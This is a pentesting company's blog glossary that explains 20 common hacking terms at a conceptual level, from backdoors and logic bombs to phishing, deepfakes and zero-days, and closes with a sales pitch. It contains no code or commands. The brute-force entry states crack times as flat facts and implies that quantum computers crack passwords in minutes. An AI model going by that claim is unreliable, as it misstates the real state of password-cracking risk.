PTaaS Checklist
Don't just "check the box". Learn 7 factors that will ensure your next pentest is a strategic advantage for your business.
PTaaS Checklist
Don't just "check the box". Learn 7 factors that will ensure your next pentest is a strategic advantage for your business.

Speak the Language of Security: 20 Essential Hacking Terminologies

Feb 27, 2025
Est Read Time: 8 min
Gisela Hinojosa

Knowing hacking terminologies forms a foundation for effective cybersecurity by making it easier to research security practices, understand attack methods, and develop defenses. We've compiled this guide as a reference for security newbies and seasoned professionals. In this blog, we'll cover 20 of the most common terms you're likely to encounter in cybersecurity discussions.

Backdoor Attacks

Backdoor attacks exploit loopholes in authentication procedures designed to keep unauthorized users out of systems. The name derives from software features designed to allow maintenance personnel to bypass authentication mechanisms, known as maintenance hooks or "backdoors". 

Backdoor vulnerabilities may stem from native system weaknesses or entry points that are created maliciously or accidentally left open by developers. For example, networking hardware may come with default passwords intended to be changed after installation, but if administrators don't update these defaults, hackers can exploit them. Other backdoor vulnerabilities may stem from downloading malicious software that has code that will allow unauthorized access.

Brute Force Attacks

A Brute force attack is a trial-and-error method used by attackers to guess credentials, encryption keys, or other sensitive information by systematically trying different combinations until the correct one is found. There are different types of brute force attacks. First, an attacker could try a massive wordlist to attempt to guess a password on a login page. This credential-guessing when powered with the right technology, can be effective, especially against weak passwords.

Second, an attacker could focus the attack on the password hash to execute an offline brute force attack. Password-cracking tools can successfully crack hashes. However, once again, password length and complexity can lengthen the hacking time to the point of making brute-force hacking mathematically impossible for practical purposes. 

Common cracking tools can crack 8-character passwords in 37 seconds, but 16-character passwords take a century. However, cutting-edge tools can crack increasingly longer passwords, and quantum computers that can perform 10-septillion-year tasks in five minutes represent a game-changer posing a new challenge for security professionals.

Cloaking

Cloaking attacks attempt to conceal malicious code from human users or security software. Code can be hidden through various methods, including embedding it in legitimate applications, making it too complex for security scans to easily spot, only transmitting it to users who meet certain criteria, or encrypting it. 

A malicious example of cloaking could come from a phishing website that displays different versions of the site’s content to different users. For example, a security scanner may see a valid and harmless version of the website. On the other hand, potential target users of the phishing attack could be shown the malicious version of content to entice them to engage with the phishing attack. 

Denial of service (DoS)

Denial-of-Service (DoS) attacks disrupt online services by overwhelming them with traffic or exploiting vulnerabilities, preventing legitimate users from access. DoS attacks fall into two main categories: network-level and application-level.

Network-level attacks target infrastructure and protocols. Common examples include SYN floods, which overwhelm server connection queues, and UDP floods, which saturate network bandwidth. Amplification attacks, like DNS amplification, leverage third-party servers to magnify attack traffic.

Application-level attacks target specific services. HTTP floods bombard web servers with requests, while slowloris attacks slowly exhaust server resources by keeping connections open. 

While not a DoS attack itself, a buffer overflow is a vulnerability that can cause a service to crash, leading to denial of service. It occurs when a program writes data beyond allocated memory, potentially corrupting it. While DoS can be a consequence, buffer overflows can also have more severe impacts, like remote code execution.

Logic bomb

Logic bombs are malicious code embedded in software designed to trigger harmful actions when certain conditions are met. For example, the code may contain instructions to copy and send files, delete files, encrypt files, open communications to remote servers, or install other malicious software. After insertion, logic bombs remain dormant in systems until their trigger condition is met. Triggers for logic bombs may be system events, user actions, the expiration of a deadline, or specified combinations of conditions. Logic bombs may be delivered through malicious software or inserted by inside attackers.

Malware

Malicious software or malware includes any type of software used by hackers to allow unauthorized access to networks or devices, steal data, disrupt service, or destroy systems or data. Malware comes in a growing number of common varieties, including:

  • Viruses attach themselves to host files and replicate by infecting other files.
  • Worms install themselves and replicate without requiring host files.
  • Ransomware encrypts data on the victim's device or network, threatening to delete the data unless an extortion fee is paid.
  • Wipers erase files on infected devices.
  • Spyware gathers information from the target.
  • Keyloggers record keystrokes on the victim's device.
  • Adware presents unwanted ads to the user and may contain code that executes other malicious actions.
  • Rogue software displays a fake virus alert to trick the user into performing actions that install other malicious code, initiate identity theft, or create other security issues.

Man in the Middle (MITM) Attacks

Man-in-the-middle attacks covertly insert bad actors into connections between other parties so that the intruder can eavesdrop on data transmissions or change transmission content. The attacker effectively becomes the relay point between the other ends of the conversation by impersonating other endpoints. MITM attacks occur after the attacker has penetrated communications through some other attack method, such as hacking weak network encryption. Once inside the stream of communication, MITM attackers may exploit their position by means such as impersonating IP packets (IP spoofing), redirecting users to other domains (DNS spoofing), or sending visitors to phony websites (HTTP spoofing).

Payload

In a cybersecurity context, a payload is the part of a malware package that contains the malicious code. A complete malware package also includes the means of installing the malicious code, known as the infection mechanism, and the code for activating the payload, known as the trigger. For example, a virus payload may be accompanied by a search routine for locating and infecting files and a logic bomb that activates the virus if a certain type of file is detected.

Ransomware

Ransomware is a type of malware that encrypts data on the target device or network and threatens to delete or leak the data unless the victim pays an extortion fee. Criminals use ransomware to target businesses, government agencies, and non-governmental organizations (NGOs). Ransomware attacks occur after the perpetrator has used some other hacking method to deliver malware to the victim. Attackers spread ransomware files through means such as phishing, email attachments, adware, infected websites, pirated software, or by exploiting known vulnerabilities.

Remote Access Trojans (RATs)

Remote access trojans are malicious files that resemble normal files and contain code that gives attackers full control over the targeted device. RATs are malicious variants of remote desktop software, used for legitimate purposes such as tech support to enable a remote user to control a local device. Hackers install RATs on target devices using methods such as phishing, email attachments, phony websites, and infected software-sharing sites. Once installed, a RAT enables the attacker to use the target device as if it were their own. The attacker can copy files, delete data, send messages, install other malware, or use the device to launch attacks on other devices and make it appear as if the victim was the perpetrator.

Rootkit

Rootkits are malicious software packages designed to give attackers access to privileged areas of devices or software, such as system administrator accounts, or to alter systems to conceal the presence of other malware. A rootkit may provide attackers with backdoor access to devices, install other malware, or enable the infected devices to be used to attack other devices. Attackers may install rootkits through means such as backdoors, infected file downloads, or malware attachments. 

Once installed, rootkits may evade detection by methods such as altering operating system instructions. For instance, a rootkit may disable an operating system's event-logging procedures to avoid recording evidence of an attack. Furthermore, rootkits are notoriously difficult to remove from a computer and often require a full factory reset on the device due to their deep integration within a system.

Social Engineering

Social engineering manipulates human users into performing compromising actions. A social engineering attack may seek to trick the victim into opening an infected file, visiting a malicious website, providing sensitive information, or authorizing a fraudulent payment. Social engineering attacks rely on deception and emotional manipulation. Attackers may impersonate trusted sources, offer targets fictitious financial opportunities, or scare victims with phony security alerts. Social engineering attacks may set the stage for other types of hacking attacks.

Phishing

Phishing attacks use communications from senders impersonating legitimate parties to lure recipients into taking compromising actions. For example, a sender may impersonate the recipient's credit card provider in an attempt to trick them into providing their password credentials. To trick users, phishing attacks are commonly sent through email or chat, and they often create a feeling of urgency to exploit people's tendency to act quickly. They may target specific individuals or organizations (spear phishing), high-value targets (whaling), or contacts of compromised business email accounts (business email compromise or BEC).

Spear Phishing 

Beyond general phishing attacks, malicious actors employ more targeted strategies. Spear phishing focuses on specific individuals or organizations, crafting personalized messages that appear highly relevant to the recipient. For instance, an attacker might impersonate a colleague, referencing shared projects and internal terminology, to trick the target into sharing sensitive data or clicking a malicious link. This tailored approach increases the likelihood of success by exploiting the recipient's trust and familiarity.

Whaling 

Whaling takes the targeted approach of speaker phishing further, concentrating on high-value organizational targets, such as executives or senior managers. These individuals often possess greater access to sensitive information and financial resources. An attacker might impersonate a trusted business partner or legal counsel, using sophisticated language and detailed knowledge of the target's activities, to persuade them to authorize fraudulent transactions.

Deep Fakes

The emergence of deepfakes introduces a new dimension to phishing and social engineering. Deepfakes utilize artificial intelligence to create highly realistic manipulated videos or audio recordings. For example, an attacker could generate a deepfake video of a CEO instructing employees to transfer funds to a fraudulent account. This sophisticated form of deception can bypass traditional security measures and erode trust in digital communications, making it increasingly difficult to distinguish between authentic and manipulated content.

Spam

Spam attacks target victims with unsolicited messages, equivalent to digital junk mail. Attackers may use spam to promote marketing campaigns or to deliver phishing or malware attacks. Spam messages may be sent through email, texts, phone calls, or social media. To reduce spam, regulatory authorities have mandated requirements for mass marketing campaigns to obtain permission from recipients before sending emails, sending texts, or making phone calls. Criminals bypass these regulations by means such as purchasing email lists from third parties or using databases of stolen contact information.

Visual Hacking

Visual hacking or shoulder surfing steals information from the target by physically looking at their screen or documents containing sensitive information. Visual hackers may position themselves in offices, Wi-Fi hotspots, or public transportation. They also may use hidden cameras to view devices remotely.

White Hat

A white hat or ethical hacker is an authorized party who uses hacking techniques for helpful purposes. For example, penetration testers (pentesters) are authorized by businesses to simulate attacks on networks in order to identify security vulnerabilities and develop mitigation strategies. White hats stand in contrast to black hats, who hack networks for malicious purposes, and gray hats, who may hack networks for non-malicious purposes without lawful authorization, for purposes such as testing their own hacking skills or convincing security teams to hire them.

Zero-day attack

Zero-day attacks exploit security vulnerabilities that are unknown to software developers and security professionals but already known to attackers. These vulnerabilities, also called zero-day exploits, can remain undetected for varying lengths of time, from a few days to several months or even years. To mitigate the risk of widespread exploitation, security teams sometimes withhold public knowledge of a zero-day vulnerability until a patch can be developed, particularly when the vulnerability resides in third-party software requiring an external fix

Once a vulnerability is discovered by attackers, a critical race begins: malicious actors attempt to exploit the flaw while security teams work to develop a patch. While security teams often require up to 14 days to create a fix, active attacks can provide valuable clues that accelerate the patching process.

Improve Security Posture with Cobalt Pentesting

The array of hacking terminology continues to expand every year as attack methods continue to multiply. To counter all the weapons available to attackers, you need offensive security testing that covers all known attack methods and all attack surfaces in your network.

Cobalt penetration testing provides you with comprehensive expert insight into your entire network's vulnerabilities to all forms of attack. Our carefully vetted core of expert pentesters represents the top 5% of the global pentesting community, working with industry leaders such as the Open Worldwide Application Security Project (OWASP) to develop and maintain cutting-edge security standards. 

We're familiar with today's most prevalent attack methods and conduct all pentests with industry-standard methodologies. Contact us to discuss how we can help you implement comprehensive security defenses against today's full array of hacking methods.

New call-to-action
Back to Blog
About Gisela Hinojosa
Gisela Hinojosa is a Senior Security Consultant at Cobalt with over 5 years of experience as a penetration tester. Gisela performs a wide range of penetration tests including, network, web application, mobile application, Internet of Things (IoT), red teaming, phishing and threat modeling with STRIDE. Gisela currently holds the Security+, GMOB, GPEN and GPWAT certifications. More By Gisela Hinojosa

Related readings

see more

Never miss a story

Stay updated about Cobalt news as it happens